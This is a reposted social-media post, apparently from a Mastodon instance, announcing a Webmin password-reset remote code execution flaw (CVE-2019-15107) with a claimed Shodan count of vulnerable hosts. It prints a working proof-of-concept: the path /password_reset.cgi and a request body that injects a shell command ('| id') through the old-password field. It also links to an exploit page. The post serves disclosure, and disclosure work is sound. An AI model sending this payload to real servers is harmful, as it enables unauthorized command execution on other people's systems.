RT @shishi0_@twitter.com

"Webmin 0day remote code execution"

Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.

PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id

pentest.com.tr/exploits/DEFCON

🐦🔗: twitter.com/shishi0_/status/11

Sign in to participate in the conversation
Mastodon

Instance généraliste majoritairement francophone.